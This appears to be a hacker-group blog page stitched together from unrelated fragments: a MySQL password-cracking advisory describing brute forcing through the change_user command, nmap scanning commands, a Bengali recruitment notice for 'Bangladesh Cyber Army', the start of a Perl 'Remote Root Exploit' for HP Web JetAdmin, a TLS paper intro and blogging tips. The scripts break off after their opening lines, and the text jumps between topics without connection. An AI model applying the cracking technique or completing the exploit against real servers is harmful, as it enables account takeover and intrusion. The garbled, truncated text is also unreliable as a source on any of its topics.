MySQL multiple security vulnerabilities

Description: Buffer overflows, information leakage, privilege escalation, DoS.

Affected:

MYQSL : MySQL 5.5

Document: 

   FAST Cracking of MySQL account passwords locally or over the network (post-auth) 
(to the maintainers: you don't need to patch this, looks alot like a minor bug, prolly documented :D) 
I found a method to crack mysql user passwords locally or over the network pretty efficiently. During Tests it was possible to test 5000 passwords per second over the network. The method is as follows: 
The attacker logs into the mysql server with an unprivileged account. There is a command in mysql called change_user, this command can be used as the name suggests to change a user during a mysql session. Since mysql is very fast in doing this it is much more powerful to crack passwords rather than reconnecting every time to the mysql server to brute force passwords (what would be VERY slow). Since the SALT does not change (and this is the weak point) in the change_user command it is a convienent way to crack passwords. (When connecting to mysql in each connection attempt the SALT is always different and sent out by the server). 
Below is an example script and an example which uses John the Ripper's capabilities to generate passwords. 
The passwords "pass" for the user "crackme" is cracked in a matter of seconds. (about 100000 passwords are tested in 20 seconds) --- cracking script 
use Net::MySQL; 

Useful Nmap Commands for Hackerz. :D

#1: Scan a single host or an IP address (IPv4)

### Scan a single ip address ###
nmap 192.168.1.1
 
## Scan a host name ###
nmap server1.cyberciti.biz
 
## Scan a host name with more info###
nmap -v server1.cyberciti.biz
 

Sample outputs:

Fig.01: nmap output

#2: Scan multiple IP address or subnet (IPv4)

nmap 192.168.1.1 192.168.1.2 192.168.1.3
## works with same subnet i.e. 192.168.1.0/24
nmap 192.168.1.1,2,3

You can scan a range of IP address too:........

বাংলাদেশ সাইবার আর্মিতে যোগদিন দেশ এর জন্য কাজ করুন (আবেদনের নিয়মাবলী)

এতদ্বারা সবাইকে জানানো যাচ্ছে যে, বাংলাদেশ সাইবার আর্মিতে নতুন সদস্য নিয়োগ করা হবে। নিয়োগ নিতিমালায় ব্যাপক পরিবর্তন আসায়, পূর্ববর্তি সকল নিয়োগ ব্যাবস্থা এবং নিতিমালা অনিদৃষ্টকালের জন্য স্থগিত করা হলো, এবং আমরা ঠিক করেছি আমাদের গ্রুপ এ বেশ কিছু নতুন মানুষকে নিয়ে আসবো, যাদের মাধ্যমে হয়তো আমাদের গ্রুপ আগের থেকে আরোও বেশী সুগঠিত আর শক্তিশালী হবে। আর যাদের বাংলাদেশ সাইবার আর্মি এর সাথে কাজ করে দেশ ও দেশের সাইবার স্পেস এর জন্য কাজ করার ইচ্ছা আছে, আশা করি তারা সকলকেই আমাদের এই পথ চলায় সাথে পাবো । 

HP Web JetAdmin 6.5 Remote Root Exploit

HP Web JetAdmin 6.5 Remote Root Exploit

#!/usr/bin/perl

use IO::Socket;

#

# This is an exploit for HP Web JetAdmin, the printer management server from HP.

# It is NOT about printers! The service usually runs on port 8000 on Windows,

# Solaris or Linux boxes.

#

# Greetz: The Phenoelit People, c-base crew, EEyE (rock!), Halvar on the other

#         side of the planet, Johnny, Andreas, Lisa, H D Moore, Nicolas

#         Fishbach and all the others I forgot

#

$|=1;

die "Specify server name or IP\n" unless ($host=shift);

#

# lala stuff

#

TLS / SSLv3 renegotiation vulnerability Paper

TLS / SSLv3 renegotiation vulnerability explained. 

  This paper explains the vulnerability for a broader audience and summarizes the information that is currently available. The document is prone to updates and is believed to be accurate by the time of writing.

Bloging Tips and Tricks

1. Increase your blog traffic

The first thing that you need to focus is actually not about how to get many subscribers to your blog, but about how to increase your blog traffic. More traffic means more opportunity to get more subscribers to your blog. With less traffic, you can’t expect to get many blog subscribers. So, you should actively increase your blog traffic by various means such as guest posting, blog commenting, forum marketing, article marketing, video marketing, and so on.

2. Create a separate squeeze page

If you want to seriously attract subscribers to your blog, create a squeeze page where you can exclusively promote your blog to your readers. Entice them to subscribe to your blog and give them free stuffs if necessary. If you only ask them to subscribe for your blog’s daily updates, you probably don’t need to do it. However, if you want to build a mailing list for your blog, it is a necessary step to do because it will increase your chance to convert your blog readers into subscribers.

Official Blog of JingoBD

Hello All..
I am JingoBD Form Bangladesh Cyber Army.
Actually i want a place where i can share my idea.  ... And Welcome to My blog. Thanks for Visit